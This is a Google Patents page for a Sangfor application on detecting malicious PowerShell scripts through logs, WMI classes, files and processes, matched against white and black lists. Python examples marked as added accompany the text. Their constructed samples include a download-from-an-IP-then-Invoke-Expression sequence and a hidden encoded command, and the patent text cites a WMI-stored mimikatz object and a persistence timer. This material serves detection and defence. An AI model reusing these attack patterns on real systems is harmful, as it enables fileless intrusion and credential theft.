CN110806980A - Detection method, device, equipment and storage medium - Google Patents


Info

Publication number
CN110806980A
Authority
CN
China
Legal status
Pending
Application number
CN201911067297.2A
Other languages
Chinese (zh)
Inventor
欧和
邹荣新
Current Assignee
Sangfor Technologies Co Ltd
Original Assignee
Sangfor Technologies Co Ltd

Classifications

    • G06F11/3644 Software debugging by instrumenting at runtime (G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F11/00 Error detection; Error correction; Monitoring > G06F11/36 Preventing errors by testing or debugging software > G06F11/362 Software debugging)
    • G06F11/366 Software debugging using diagnostics (same parent path, under G06F11/362)


Abstract

The application discloses a detection method, a detection device, equipment and a storage medium, wherein the method comprises the following steps: acquiring script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script; acquiring a detection standard corresponding to the script characteristics; and detecting the script characteristics according to the detection standard to generate a detection result. The method relatively ensures the stability of service operation in the server. In addition, the application also provides a detection device, equipment and a storage medium, and the beneficial effects are as described above.

Description

Detection method, device, equipment and storage medium
Technical Field
The present application relates to the field of network security, and in particular, to a detection method, apparatus, device, and storage medium.
Background
In the field of computer science, Shell is software (command parser) that provides an operation interface for a user, and is used to receive a user command and then call a corresponding application program.
A Shell script is a program written using the functions of the Shell: it is a plain-text file containing Shell syntax and instructions, and it uses regular expressions, pipeline commands, data-stream redirection and the like to achieve the processing the user requires. Because Shell scripts are highly executable, malicious users currently tamper with server data mostly by implanting Shell scripts on the server and executing them, which reduces the stability of service operation in the server.
Therefore, it is a problem to be solved by those skilled in the art to provide a detection method to relatively ensure the stability of service operation in a server.
Disclosure of Invention
The application aims to provide a detection method, a detection device, detection equipment and a storage medium, so as to relatively ensure the stability of service operation in a server.
In order to solve the above technical problem, the present application provides a detection method, including:
acquiring script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script;
acquiring a detection standard corresponding to the script characteristics;
and detecting the script characteristics according to the detection standard to generate a detection result.
Preferably, the script features include one or more of instructions executed by the script, strings in the script, and paths of the script.
Preferably, when the target detection dimension is a log generated in the script execution process, acquiring script features of the script in the target detection dimension includes:
and reading the log file under the log path corresponding to the script, and acquiring the script characteristics in the log file.
Preferably, when the target detection dimension is a WMI system plug-in called during the script execution process, acquiring a script feature of the script in the target detection dimension includes:
and acquiring a WMI class corresponding to the WMI system plug-in called in the script execution process, and reading script characteristics in the parameters of the WMI class.
Preferably, when the target detection dimension is a file of the script, acquiring script features of the script in the target detection dimension includes:
and acquiring related files triggered when the script is executed, and acquiring script characteristics according to the related files.
Preferably, when the target detection dimension is a process of the script, acquiring a script feature of the script in the target detection dimension includes:
and acquiring a related process started when the script is executed, and acquiring the script characteristics according to the related process.
Preferably, the obtaining of the detection criteria corresponding to the script features includes:
and acquiring a feature white list and a feature black list corresponding to the script features.
Preferably, the detecting the script features according to the detection standard to generate a detection result includes:
judging whether the script features are matched with a feature white list or not;
if the script features are matched with the feature white list, setting the script features as normal features;
if the script features are not matched with the feature white list, judging whether the script features are matched with the feature black list;
if the script features are matched with the feature blacklist, setting the script features as abnormal features;
if the script features do not match the feature blacklist, the user is prompted for the script features.
In addition, the present application also provides a detection device, including:
the characteristic reading module is used for acquiring script characteristics of the script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script;
the detection standard acquisition module is used for acquiring a detection standard corresponding to the script characteristics;
and the detection module is used for detecting the script characteristics according to the detection standard to generate a detection result.
In addition, the present application also provides an electronic device, including:
a memory for storing a computer program;
a processor for implementing the steps of the detection method as described above when executing the computer program.
Furthermore, the present application also provides a computer-readable storage medium, on which a computer program is stored, which, when being executed by a processor, realizes the steps of the detection method as described above.
The detection method first obtains the script features of a script under a target detection dimension, where the target detection dimension comprises at least one of a log generated during script execution, a WMI system plug-in called during script execution, the file of the script and the process of the script; it then obtains a detection standard corresponding to the script features and detects the script features according to that standard to generate a detection result. Because the log generated during script execution, the WMI system plug-in called during script execution, the script file and the script process can each yield features that represent the identity of the script, whether the script is malicious can be detected and judged from the features of any one of these dimensions (log, WMI system plug-in, file or process), scripts that may tamper with server data can be filtered out, and the stability of service operation in the server is relatively ensured. In addition, the application also provides a detection device, equipment and a storage medium, whose beneficial effects are as described above.
Drawings
In order to more clearly illustrate the embodiments of the present application, the drawings needed for the embodiments will be briefly described below, and it is obvious that the drawings in the following description are only some embodiments of the present application, and that other drawings can be obtained by those skilled in the art without inventive effort.
FIG. 1 is a flow chart of a detection method disclosed herein;
FIG. 2 is a flow chart of a particular detection method disclosed herein;
FIG. 3 is a flow chart of a particular detection method disclosed herein;
FIG. 4 is a flow chart of a particular detection method disclosed herein;
FIG. 5 is a flow chart of a particular detection method disclosed herein;
FIG. 6 is a flow chart of a particular detection method disclosed herein;
FIG. 7 is a schematic structural diagram of a detection apparatus disclosed in the present application.
Detailed Description
The technical solutions in the embodiments of the present application will be clearly and completely described below with reference to the drawings in the embodiments of the present application, and it is obvious that the described embodiments are only a part of the embodiments of the present application, and not all the embodiments. All other embodiments obtained by a person of ordinary skill in the art based on the embodiments in the present application without any creative effort belong to the protection scope of the present application.
A Shell script is a program written using the functions of the Shell: it is a plain-text file containing Shell syntax and instructions, and it uses regular expressions, pipeline commands, data-stream redirection and the like to achieve the processing the user requires. Because Shell scripts are highly executable, malicious users currently tamper with server data mostly by implanting Shell scripts on the server and executing them, which reduces the stability of service operation in the server.
Therefore, the core of the application is to provide a detection method to relatively ensure the stability of service operation in the server.
Referring to fig. 1, an embodiment of the present application discloses a detection method, including:
step S10: and acquiring script characteristics of the script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script.
It should be noted that this step essentially acquires the script features of the script in a target detection dimension, where the target detection dimension refers to a related program or file that can embody a static attribute feature or a dynamic attribute feature of the script.
This embodiment focuses on the case where the target detection dimension comprises at least the log generated during script execution and/or the WMI system plug-in called during script execution. The log generated while a script executes records the static or dynamic attribute features of the script, namely the script features; so, provided the script produces a log when it executes, and since the script features embody both the characteristics of the script and the related operations it may perform, the identity of the script can be judged from those script features. Similarly, a script can register its dynamic or static attribute features into the system through a WMI system plug-in so that the system automatically triggers and executes the operations contained in the script, which is how a malicious script achieves a persistent attack on the system via the WMI system plug-in; the script's dynamic or static attribute features, i.e. the script features, can therefore likewise be obtained through the WMI system plug-in. In addition, since executing a script essentially requires a script file as its carrier, the instructions executed by the script, the strings in the script and the path where the script is located can also be obtained from the script's file. Finally, a script starts a corresponding process in the system while it executes, so the type of the script can also be judged from the script's file and from the process it starts during execution; this relatively enriches the target detection dimensions on which script detection is based and further improves the overall accuracy of script detection.
Step S11: and acquiring a detection standard corresponding to the script feature.
On the basis of acquiring the script features, the present embodiment further determines the identity of the corresponding script based on the script features, so that a corresponding detection standard is first acquired for the script features, and the detection standard is used to determine whether the content of the script features is in the content category of a certain type of script. It can be understood that, since there are corresponding determination criteria for different types of script features, when there are multiple types of script features, corresponding detection criteria should be obtained for each type of script feature.
Step S12: and detecting the script characteristics according to the detection standard to generate a detection result.
After the script features and the corresponding detection criteria are obtained, the script features are detected according to the detection criteria, that is, it is determined on the basis of the detection criteria which type of script the content of the script features belongs to, and a detection result representing the type of the script is then obtained.
The detection method first obtains the script features of a script under a target detection dimension, where the target detection dimension comprises at least one of a log generated during script execution, a WMI system plug-in called during script execution, the file of the script and the process of the script; it then obtains a detection standard corresponding to the script features and detects the script features according to that standard to generate a detection result. Because the log generated during script execution, the WMI system plug-in called during script execution, the script file and the script process can each yield features that represent the identity of the script, whether the script is malicious can be detected and judged from the features of any one of these dimensions (log, WMI system plug-in, file or process), scripts that may tamper with server data can be filtered out, and the stability of service operation in the server is relatively ensured.
On the basis of the above-described examples, the present application also provides the following preferred embodiments.
As a preferred embodiment, the script features include one or more of instructions executed by the script, strings in the script, and paths of the script.
It should be noted that the instructions executed by the script, the strings in the script and the path where the script is located can be obtained directly from the logs generated during script execution and from the WMI system plug-in called during script execution, and that normal scripts and malicious scripts differ directly in these instructions, strings and paths, so the type of the script can be determined relatively accurately by acquiring one or more of the instructions executed by the script, the strings in the script and the paths of the script.
When the target detection dimension is a log generated in the script execution process, an embodiment of the present application discloses a detection method, as shown in fig. 2, including:
step S20: and reading the log file under the log path corresponding to the script, and acquiring the script characteristics in the log file.
Step S21: and acquiring a detection standard corresponding to the script feature.
Step S22: and detecting the script characteristics according to the detection standard to generate a detection result.
It should be noted that in this embodiment, script features need to be obtained based on a log generated in the script execution process, and the log generated in the script execution process is often recorded in a log file under a log path corresponding to the script, so when the target detection dimension is the log generated in the script execution process, in this embodiment, the log file is read under the log path corresponding to the script, and then the script features are obtained in the obtained log file, which relatively ensures accurate obtaining of the log file, and further ensures accuracy of the script features.
On the basis of the above embodiment, as a preferred implementation, when the target detection dimension is the file of the script, the script features further include the file hash value of the script and the file that indirectly calls the script.
It should be noted that the file hash value in this embodiment is generated by applying a hash function to the script's file, and the hash value can represent a unique file identity, so the identity type of the script can be obtained accurately through the file hash value of the script; in addition, the file that indirectly calls the script file and causes it to be executed can be searched for starting from the script file, and the identity type of the script file can be further obtained by judging the type of the file that calls it. This embodiment can thus further improve the accuracy of detecting the script when the target detection dimension is the file of the script.
When the target detection dimension is a WMI system plug-in called in the script execution process, an embodiment of the present application discloses a detection method, as shown in fig. 3, including:
step S30: and acquiring a WMI class corresponding to the WMI system plug-in called in the script execution process, and reading script characteristics in the parameters of the WMI class.
Step S31: and acquiring a detection standard corresponding to the script feature.
Step S32: and detecting the script characteristics according to the detection standard to generate a detection result.
It should be noted that in this embodiment the script features need to be obtained from the WMI system plug-in called during script execution, and the script features are often passed as parameters of the WMI class invoked by the WMI system plug-in in order to execute it, so this embodiment obtains the WMI class corresponding to the WMI system plug-in called during script execution and reads the script features from the parameters of that WMI class, thereby relatively ensuring accurate acquisition of the log file and further ensuring the accuracy of the script features.
When the target detection dimension is a file of a script, an embodiment of the present application discloses a detection method, as shown in fig. 4, including:
step S40: and acquiring related files triggered when the script is executed, and acquiring script characteristics according to the related files.
Step S41: and acquiring a detection standard corresponding to the script feature.
Step S42: and detecting the script characteristics according to the detection standard to generate a detection result.
It should be noted that, in this embodiment, the target detection dimension is a file dimension of the script, so that the script feature should be obtained based on the file related to the script, and then the embodiment obtains the related file triggered when the script is executed, and then obtains the script feature according to the related file.
When the target detection dimension is a process of a script, an embodiment of the present application discloses a detection method, as shown in fig. 5, including:
step S50: and acquiring a related process started when the script is executed, and acquiring the script characteristics according to the related process.
Step S51: and acquiring a detection standard corresponding to the script feature.
Step S52: and detecting the script characteristics according to the detection standard to generate a detection result.
It should be noted that in this embodiment the target detection dimension is the process of the script, so the script features should be obtained from the processes related to the script: the embodiment acquires the related process started when the script is executed and then obtains the script features from that process. Because the instructions executed by a script directly determine the process it starts, and the process started during execution reflects the operations the script performs, the correlation between that related process and the script is high; when the target detection dimension is the process of the script, the type of the script can therefore be further determined by examining the process started when the script is executed. Obtaining the script features from the related process started by the script thus relatively ensures the accuracy of the script features.
On the basis of the above embodiment, as a preferred implementation, the script may specifically be a PowerShell script. PowerShell is a command-line scripting environment running on the Windows operating system that automates management of the system and applications; it requires a .NET environment and, with the help of the rich class library of the .NET Framework platform, can perform comprehensive operations on the system. Attacking servers through PowerShell scripts is currently a popular attack mode, so this embodiment can relatively ensure reliable detection of PowerShell scripts in the server and thereby the stability of the services running on it.
Referring to fig. 6, an embodiment of the present application discloses a detection method, including:
step S60: and acquiring script characteristics of the script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script.
Step S61: and acquiring a feature white list and a feature black list corresponding to the script features.
Step S62: and judging whether the script features are matched with the feature white list, if so, executing the step S63, and otherwise, executing the step S64.
Step S63: the script feature is set to the normal feature.
Step S64: and judging whether the script features are matched with the feature blacklist, if so, executing the step S65, and otherwise, executing the step S66.
Step S65: the script feature is set to an exception feature.
Step S66: and prompting the script characteristics to the user for the user to judge the script characteristics.
It should be noted that, in this embodiment, the process of detecting the script essentially judges whether the script features of the script in the target detection dimension are matched with the features in the feature white list and the feature blacklist, and if the script features of the script in the target detection dimension are matched with the features in the feature white list, it is determined that the script features are normal features, that is, the corresponding script is a normal script; if the script features of the script under the target detection dimension are matched with the features in the feature blacklist, the script features are indicated to be abnormal features, namely the corresponding script is abnormal, and further, if the script features are not matched with the features in the feature blacklist and are not matched with the features in the feature whitelist, the script features are prompted to a user for the user to further judge the script features.
In this embodiment, after the feature white list and the feature blacklist corresponding to the script feature are obtained, the script feature is further matched with the content in the feature white list, and if the script feature is not matched with the feature white list, whether the script feature is matched with the feature blacklist is further determined.
In addition, it should be emphasized that, although the solution of this embodiment is to match the script features with the content in the feature white list first, and match the script features with the content in the feature blacklist when the script features are not matched, the present application is not limited to the above matching sequence, but the script features may be first matched with the content in the feature blacklist, if the script features are not matched with the feature blacklist, the script features are further matched with the feature white list, and further, if the script features are not matched with the feature white list, the script features are further prompted to the user for the user to determine the script features.
As a preferred embodiment, after the script feature is determined as an abnormal feature, the script feature may be further mapped to a script to which the script feature belongs, and the script is deleted or a popup abnormal prompt is presented to the user for the script, so that the user can manually determine the script feature and generate a corresponding detection result.
In order to further deepen understanding of the technical solution of the present application, a scene embodiment in a specific scene is provided below for explanation.
In this scheme, PowerShell attack scripts are subjected to deep, systematic detection from four dimensions, namely file monitoring, process monitoring, log monitoring and WMI monitoring, based on abnormal behaviour features together with blacklist/whitelist (block/allow) actions selectable by the user.
1. File aspect: newly generated files are filtered using real-time file monitoring, and potentially PowerShell-related files are filtered out and matched.
Specifically, newly generated files are filtered using real-time file monitoring, and potentially PowerShell-related files are filtered out. Potentially PowerShell-related files fall into two categories: PowerShell script files and PowerShell calling files. The former are files in ps1 format, which PowerShell can parse and run directly. The latter can be files in bat, hta, vbs, office (vba) and other formats, which achieve the purpose of calling PowerShell indirectly by being invoked through a host program.
2. Process aspect: potentially PowerShell-related processes are filtered out through real-time process monitoring, associated in advance with their PowerShell scripts, and finally matched.
Potentially PowerShell-related processes are filtered out by monitoring processes in real time. They fall into two main categories: PowerShell processes and PowerShell calling processes. The former are processes running PowerShell.exe, the system file responsible for parsing PowerShell. The latter are processes started by a corresponding script (the calling file) that in turn invoke PowerShell indirectly.
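The process-aspect step above (relate each PowerShell process to the script it runs, directly via a ps1 file or indirectly via a calling process) as an added Python example; it is not code from the patent, the process snapshot is constructed, and the host-program table, the pwsh.exe image name and the -EncodedCommand decoding are assumptions that go slightly beyond the page:

```python
import base64
import re
from typing import Dict, List, Optional

# Image names treated as PowerShell processes (pwsh.exe is the newer host;
# it is a known alternative added here, not named on the page).
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Host programs through which a calling file (bat, vbs, hta, office/vba) can
# indirectly start PowerShell, mapped to the calling-file category.
CALLING_HOSTS = {
    "cmd.exe": "bat",
    "wscript.exe": "vbs",
    "cscript.exe": "vbs",
    "mshta.exe": "hta",
    "winword.exe": "office",
    "excel.exe": "office",
}

# A script-file argument on a command line (paths containing spaces are not
# handled, to keep the pattern short).
SCRIPT_FILE_RE = re.compile(
    r'"?([A-Za-z]:\\[^"\s]+?\.(ps1|bat|cmd|vbs|hta|docm?|xlsm?))"?(?=\s|$)',
    re.IGNORECASE,
)
# -EncodedCommand and the abbreviated forms PowerShell accepts for it.
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the instructions behind -EncodedCommand (base64 of UTF-16LE)."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def relate_powershell_processes(snapshot: List[Dict]) -> List[Dict]:
    """For every PowerShell process, find the script it runs: either a .ps1
    passed on its own command line, or the calling file of the host program
    found by walking up the parent chain."""
    by_pid = {p["pid"]: p for p in snapshot}
    findings = []
    for proc in snapshot:
        if _basename(proc["image"]) not in POWERSHELL_IMAGES:
            continue
        rec = {"pid": proc["pid"], "script_file": None, "category": None,
               "caller_chain": [], "command": decode_encoded_command(proc["cmdline"])}
        m = SCRIPT_FILE_RE.search(proc["cmdline"])
        if m and m.group(2).lower() == "ps1":
            rec["script_file"], rec["category"] = m.group(1), "ps1"
        parent, seen = by_pid.get(proc["ppid"]), {proc["pid"]}
        while parent is not None and parent["pid"] not in seen:   # guard against pid reuse loops
            seen.add(parent["pid"])
            name = _basename(parent["image"])
            rec["caller_chain"].append(name)
            if rec["category"] is None and name in CALLING_HOSTS:
                pm = SCRIPT_FILE_RE.search(parent["cmdline"])
                if pm:
                    rec["script_file"], rec["category"] = pm.group(1), CALLING_HOSTS[name]
            parent = by_pid.get(parent["ppid"])
        findings.append(rec)
    return findings


# Constructed process snapshot (pid/ppid/image/cmdline); the encoded command is
# built here from a plaintext so that the sample stays self-contained.
SAMPLE_PLAIN_COMMAND = "Invoke-Expression (Get-Content 'C:\\Users\\Public\\a.txt')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PLAIN_COMMAND.encode("utf-16le")).decode()
SAMPLE_SNAPSHOT = [
    {"pid": 4, "ppid": 0, "image": "C:\\Windows\\System32\\services.exe", "cmdline": "services.exe"},
    {"pid": 1200, "ppid": 1000, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 3100, "ppid": 1200, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\Public\\invoice.vbs"'},
    {"pid": 3120, "ppid": 3100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + SAMPLE_ENCODED},
    {"pid": 3300, "ppid": 4, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NonInteractive -File C:\\Scripts\\backup.ps1"},
    {"pid": 3400, "ppid": 1200, "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in relate_powershell_processes(SAMPLE_SNAPSHOT):
        print(finding)
```

The second finding (pid 3300) is the direct case with its ps1 path; the first (pid 3120) is the indirect case, resolved through wscript.exe to the vbs calling file and with the encoded instructions recovered.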
3. Log aspect: the calling and execution of PowerShell is audited by the system and recorded as logs, so whether malicious PowerShell scripts exist can be judged from the logs.
When any PowerShell command or script is executed, locally or through remoting, Windows writes events to the following log files:
Windows PowerShell.evtx;
Microsoft-Windows-PowerShell/Operational.evtx;
Microsoft-Windows-PowerShell/Analytic.etl;
Microsoft-Windows-WinRM/Operational.evtx;
Microsoft-Windows-WinRM/Analytic.etl.
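Step S20 (read the script's log and pull the script features out of it) together with the three feature kinds of the preferred embodiment (instructions executed, strings, paths), as an added Python example that is not part of the patent; the log records are constructed, their field names are assumptions, and the regular expressions are one simple way to recognise each feature kind in PowerShell text:

```python
import re
from typing import Dict, List

# Constructed sample records of the kind written to
# Microsoft-Windows-PowerShell/Operational when a script block runs.
# Field names and values are assumptions made for this example.
SAMPLE_LOG_RECORDS = [
    {
        "channel": "Microsoft-Windows-PowerShell/Operational",
        "script_path": "C:\\Users\\Public\\update.ps1",
        "script_block": (
            "$c = New-Object System.Net.WebClient\n"
            "$c.DownloadFile('http://198.51.100.7/a.txt', 'C:\\Users\\Public\\a.txt')\n"
            "Invoke-Expression (Get-Content 'C:\\Users\\Public\\a.txt')"
        ),
    },
    {
        "channel": "Microsoft-Windows-PowerShell/Operational",
        "script_path": "C:\\Scripts\\backup.ps1",
        "script_block": (
            "Get-ChildItem 'D:\\data' | "
            "Compress-Archive -DestinationPath 'D:\\backup.zip'"
        ),
    },
]

# Verb-Noun cmdlet names (New-Object, Invoke-Expression, ...); parameters such
# as -DestinationPath are not matched because no letters precede their hyphen.
CMDLET_RE = re.compile(r"\b[A-Za-z]+-[A-Za-z]+\b")
# .NET member calls such as $c.DownloadFile(...).
MEMBER_CALL_RE = re.compile(r"\.([A-Za-z_]+)\s*\(")
# Single- or double-quoted string literals.
STRING_RE = re.compile(r"'([^']*)'|\"([^\"]*)\"")
# Windows drive-letter paths (stops at whitespace, quotes and parentheses).
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\"()]+")


def extract_script_features(script_text: str, script_path: str = "") -> Dict[str, List[str]]:
    """Return the three feature kinds the detection standard is matched
    against: instructions executed, string literals, and paths (the script's
    own path plus every path it refers to).  Lists are sorted and de-duplicated
    so that results are stable."""
    instructions = set(CMDLET_RE.findall(script_text))
    instructions.update(MEMBER_CALL_RE.findall(script_text))
    strings = {a or b for a, b in STRING_RE.findall(script_text)}
    paths = set(PATH_RE.findall(script_text))
    if script_path:
        paths.add(script_path)
    return {
        "instructions": sorted(instructions),
        "strings": sorted(strings),
        "paths": sorted(paths),
    }


def features_from_log(records) -> List[Dict[str, List[str]]]:
    """Step S20: walk the log records under the script's log path and extract
    the script features from each one."""
    return [extract_script_features(r["script_block"], r.get("script_path", ""))
            for r in records]


if __name__ == "__main__":
    for rec, feats in zip(SAMPLE_LOG_RECORDS, features_from_log(SAMPLE_LOG_RECORDS)):
        print(rec["script_path"])
        for kind, values in feats.items():
            print(f"  {kind}: {values}")
```

The same function serves the file dimension (Step S40) when fed the contents of a ps1 file instead of a log record.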
4. WMI aspect: WMI + PowerShell is an important means of achieving persistent fileless attacks, so monitoring WMI also serves to detect PowerShell attack scripts.
Example 1: ([WmiClass]'root\default:Win32_TaskService').Properties['mi']
In the above command, [WmiClass] is the WMI class type accelerator; the virus registers the class Win32_TaskService and stores in it the mimi object definition, i.e. the well-known hacker tool mimikatz, which is used for password stealing in intranet penetration and attack scenarios.
Example 2: SELECT * FROM __InstanceModificationEvent WITHIN 5600
The above command registers the WMI class as a timer that fires every 5600 seconds, with the start item named InstanceModificationEvent, corresponding to the WMI class ([WmiClass]'root\default:Win32_Services').
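Step S30 applied to Examples 1 and 2 (read the parameters of registered WMI classes, and join the WITHIN timer filter to the command it triggers), as an added Python example that is not part of the patent; the WMI snapshot is constructed to resemble what Get-CimInstance returns, the blob is filler rather than a real payload, and the consumer/binding objects and the size threshold are assumptions:

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed snapshot of WMI objects (class definitions in root\default plus
# the event-subscription objects of root\subscription).  Names, values and
# field layout are assumptions; the blob is constructed filler.
SAMPLE_BLOB = base64.b64encode(b"constructed placeholder payload " * 60).decode()
SAMPLE_WMI_SNAPSHOT = {
    "classes": [
        {"namespace": "root\\default", "class": "Win32_TaskService",
         "properties": {"mi": SAMPLE_BLOB}},
        {"namespace": "root\\default", "class": "CustomInventory",
         "properties": {"Version": "1.2.3", "Owner": "IT"}},
    ],
    "event_filters": [
        {"name": "UpdateFilter", "namespace": "root\\subscription",
         "query": "SELECT * FROM __InstanceModificationEvent WITHIN 5600"},
    ],
    "consumers": [
        {"name": "UpdateConsumer", "type": "CommandLineEventConsumer",
         "command_line_template": "powershell.exe -NoProfile -Command "
         "\"([WmiClass]'root\\default:Win32_TaskService').Properties['mi'].Value\""},
    ],
    "bindings": [
        {"filter": '__EventFilter.Name="UpdateFilter"',
         "consumer": 'CommandLineEventConsumer.Name="UpdateConsumer"'},
    ],
}

BASE64_BLOB_RE = re.compile(r"^[A-Za-z0-9+/=\s]{200,}$")
PS_TOKEN_RE = re.compile(r"powershell|\[WmiClass\]|Invoke-Expression|-EncodedCommand", re.IGNORECASE)
WQL_RE = re.compile(r"FROM\s+(\w+)(?:\s+WITHIN\s+(\d+))?", re.IGNORECASE)
OVERSIZED = 1024  # characters; a configuration property rarely needs more (assumption)


def inspect_class_properties(snapshot: Dict) -> List[Dict]:
    """Step S30: read the parameters of each registered WMI class and report
    the properties whose value looks like stored script content (Example 1)."""
    findings = []
    for cls in snapshot["classes"]:
        for prop, value in cls["properties"].items():
            if not isinstance(value, str):
                continue
            reasons = []
            if len(value) > OVERSIZED:
                reasons.append("oversized")
            if BASE64_BLOB_RE.match(value):
                reasons.append("base64_like")
            if PS_TOKEN_RE.search(value):
                reasons.append("powershell_token")
            if reasons:
                findings.append({"class": f"{cls['namespace']}:{cls['class']}",
                                 "property": prop, "reasons": sorted(reasons)})
    return findings


def parse_wql(query: str) -> Tuple[Optional[str], Optional[int]]:
    """Return (event class, polling interval in seconds or None) of a WQL filter."""
    m = WQL_RE.search(query)
    if not m:
        return None, None
    return m.group(1), (int(m.group(2)) if m.group(2) else None)


def correlate_subscriptions(snapshot: Dict) -> List[Dict]:
    """Join __EventFilter -> binding -> consumer, so that a timer such as
    Example 2 is seen together with the command it triggers."""
    filters = {f["name"]: f for f in snapshot["event_filters"]}
    consumers = {c["name"]: c for c in snapshot["consumers"]}
    name_re = re.compile(r'Name="([^"]+)"')
    findings = []
    for b in snapshot["bindings"]:
        fm, cm = name_re.search(b["filter"]), name_re.search(b["consumer"])
        flt = filters.get(fm.group(1)) if fm else None
        con = consumers.get(cm.group(1)) if cm else None
        if flt is None or con is None:
            continue
        event_class, within = parse_wql(flt["query"])
        cmd = con.get("command_line_template", "")
        findings.append({
            "filter": flt["name"], "consumer": con["name"],
            "event_class": event_class, "within_seconds": within,
            "runs_powershell": bool(PS_TOKEN_RE.search(cmd)),
            # a [WmiClass]...Properties[...] expression in the command reads
            # back a stored class property, linking the timer to Example 1
            "reads_class_property": "[WmiClass]" in cmd and ".Properties[" in cmd,
        })
    return findings


if __name__ == "__main__":
    for f in inspect_class_properties(SAMPLE_WMI_SNAPSHOT) + correlate_subscriptions(SAMPLE_WMI_SNAPSHOT):
        print(f)
```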
The general logic of script detection is as follows. First, white-feature matching is performed on the script features of the relevant dimension; if they match, the script is released and the process ends. If they do not match, black-feature matching is performed on the script features; if they match, an alarm is raised, the script is intercepted, and the process ends. If neither matches, that is, it cannot be determined whether the script is black or white, the user is prompted to judge and choose manually. The judgment actions are as follows:
Ignore: ignore this behavior, record no log and perform no operation; the behavior goes through the flow again next time;
Block as black: intercept this behavior, regard it as black and add it to the black features; it is intercepted automatically next time;
Release as white: release this behavior, regard it as white and add it to the white features; it is released automatically next time.
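The white-then-black matching flow and the three manual judgment actions described above, as an added example that is not part of the patent. It is also the logic the white-list judging, normal-feature, black-list judging, abnormal-feature and user-prompting modules of the device below implement. The feature strings and the initial list contents are constructed, and the rule that a script is judged by its worst feature is an assumption of this example, not something the patent states.

```python
"""Detection standard: white match, then black match, then manual judgment
whose outcome updates the lists for the next run.

Added example, not code from the patent; all feature strings are constructed."""
from dataclasses import dataclass, field
from typing import Iterable, List, Set

NORMAL, ABNORMAL, PENDING = "normal", "abnormal", "pending"
RELEASE, INTERCEPT, PROMPT, NONE = "release", "intercept", "prompt", "none"


@dataclass
class DetectionStandard:
    white: Set[str] = field(default_factory=set)
    black: Set[str] = field(default_factory=set)


@dataclass(frozen=True)
class Verdict:
    result: str    # NORMAL / ABNORMAL / PENDING
    action: str    # RELEASE / INTERCEPT / PROMPT / NONE


def detect_feature(feature: str, std: DetectionStandard) -> Verdict:
    """The white list is consulted first, so a feature on both lists is
    released; only a feature on neither list is handed to the user."""
    if feature in std.white:
        return Verdict(NORMAL, RELEASE)
    if feature in std.black:
        return Verdict(ABNORMAL, INTERCEPT)
    return Verdict(PENDING, PROMPT)


def detect_script(features: Iterable[str], std: DetectionStandard) -> Verdict:
    """Assumption for the example: a script is judged by its worst feature.
    One black feature intercepts the script; otherwise any undecided feature
    defers the script to the user; otherwise it is released."""
    verdicts = [detect_feature(f, std) for f in features]
    if any(v.result == ABNORMAL for v in verdicts):
        return Verdict(ABNORMAL, INTERCEPT)
    if any(v.result == PENDING for v in verdicts):
        return Verdict(PENDING, PROMPT)
    return Verdict(NORMAL, RELEASE)


def apply_user_judgment(feature: str, choice: str, std: DetectionStandard) -> Verdict:
    """The three manual actions from the text.  'ignore' changes nothing, so
    the feature is prompted again next time; 'block' and 'release' update the
    lists so the next run is decided automatically."""
    if choice == "ignore":
        return Verdict(PENDING, NONE)
    if choice == "block":
        std.black.add(feature)
        return Verdict(ABNORMAL, INTERCEPT)
    if choice == "release":
        std.white.add(feature)
        return Verdict(NORMAL, RELEASE)
    raise ValueError(f"unknown judgment: {choice}")


def demo() -> List[str]:
    """Two runs of the same script: first undecided, then decided by the lists."""
    std = DetectionStandard(
        white={"instruction:Get-Date", "path:C:\\ops\\deploy.ps1"},
        black={"path:C:\\Users\\Public\\stage.ps1"},
    )
    script = ["instruction:Get-Content", "instruction:Invoke-Expression"]
    first = detect_script(script, std)
    apply_user_judgment("instruction:Invoke-Expression", "block", std)
    apply_user_judgment("instruction:Get-Content", "release", std)
    second = detect_script(script, std)
    return [first.result, second.result]


if __name__ == "__main__":
    print(demo())
```

Because the white list is checked first, the order of the two lists is a policy decision: an operator who releases a feature as white later cannot be overridden by a black entry for the same feature unless the white entry is removed, which is worth keeping in mind when the lists are maintained by different people.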
Referring to fig. 7, an embodiment of the present application discloses a detection apparatus, including:
the feature reading module 10 is configured to obtain a script feature of a script in a target detection dimension, where the target detection dimension at least includes a log generated in a script execution process and/or a WMI system plug-in called in the script execution process;
a detection standard obtaining module 11, configured to obtain a detection standard corresponding to the script feature;
and the detection module 12 is configured to detect the script features according to the detection standard to generate a detection result.
